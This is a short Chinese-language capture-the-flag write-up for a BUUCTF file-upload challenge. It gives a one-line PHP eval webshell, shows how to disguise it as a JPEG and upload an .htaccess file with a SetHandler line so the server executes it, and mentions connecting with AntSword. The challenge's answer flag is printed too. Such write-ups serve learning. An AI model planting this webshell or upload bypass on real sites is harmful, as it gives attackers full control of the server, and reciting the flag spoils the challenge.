【Buuctf】[MRCTF2020]你传你🐎呢 WriteUp
题目
文件上传,那就传个一句话木马
最基础的代码,新建一个php文件,写入
<?php @eval($_POST['attack']) ?>
抓包
修改文件后缀为jpg,更改Content-Type为image/jpeg
传入的是jpg文件,我们需要这个解析成php文件,需要再传一个htaccess文件
新建一个htaccess文件,写入
SetHandler application/x-httpd-php
一样修改一下Content-Type
链接蚁剑,密码就是写在一句话木马POST里面的东西
flag:flag{d7fcb5bf-0e2b-48d4-a3f1-e23c488ec28b}
webshell
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。
一句话木马
简称Webshell,到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此
利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过蚁剑即可获取和控制整个网站目录。
@表示后面即使执行错误,也不报错。
eval()函数表示括号内的语句字符串什么的全都当做代码执行。
$_POST['attack']表示从页面中获得attack这个参数值。
htaccess
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
